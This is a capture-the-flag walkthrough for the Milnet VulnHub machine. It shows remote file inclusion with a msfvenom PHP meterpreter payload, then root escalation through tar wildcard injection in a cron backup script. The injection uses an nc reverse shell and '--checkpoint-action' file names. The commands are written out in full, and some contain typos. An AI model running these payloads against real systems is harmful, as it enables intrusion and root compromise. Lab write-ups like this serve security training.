This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.
Download the VM from –> https://www.vulnhub.com/entry/milnet-1,148/
As always start off by locating the target with the following command:
netdiscover
nmap -A -p- 192.168.0.105
To know more about our target we will use nikto.
nikto -h 192.168.0.105
As you can see we did not acquire much information from nikto so let us open it on our browser, maybe we can find something from there.
Looking into the page source and all the tabs on the left side we could not find anything. So we explored and searched allot and we found remote file inclusion vulnerability. Upon finding the said vulnerability our step was clear i.e. we had use Tamper data.
So go to Tools on menu bar and select Tamper data
Then click on main button, a dialog box will open and from this dialog box click on Tamper.
Now generate the php code with the help of which we will have our meterpreter session and to generate the code type:
msfvenom php/meterpreter/reverse_tcp lhost=192.1680.103 lport=4444 -f raw
Copy the code from <?php to die() and save it on the file with extension .php. After the file is saved, transfer the file to var/www/html
Then on Tamper Data give the path of the file without the extension in the text box adjacent to route. For example type:
http://192.168.0.103/evil?
Before clicking on OK run metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:
sysinfo
Then you type the set of following commands to reach the terminal:
shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.pyNow that we are in the terminal, we wil look for the version of kernel to know wheather its vulnerbale or not and ofr that type:
lsb_release -a
As you can see, kernel’s version is not exploitable. So we searched and looked for any other option which could help us gain root’s access. And so we looked in to the /passwd with the following command
cat /etc/passwd
This file will show the name of user langman and we switched our user to langman. So we checked the user on home by typing:
cd home
ls
And then we switched:
cd langman
Then check the list of thing present in langman by typing :
ls
There is only one folder available so let’s go into it.
cd SDINET
ls(to check the contents of SDINET)
Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains unix wildcard attacks.
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:
cat /etc/crontab
cat /backup/backup.sh
nc -lvp 443
This will help us to achieve arbitrary command execution stemming from the tar command within the backup.sh script.
Next we ran the following commands:
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.0.103 443 >/tmp/f” > shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
touch “/var/www/html/–checkpoint=1”
The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 443.
And if you go back to the terminal window where the listener was on.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast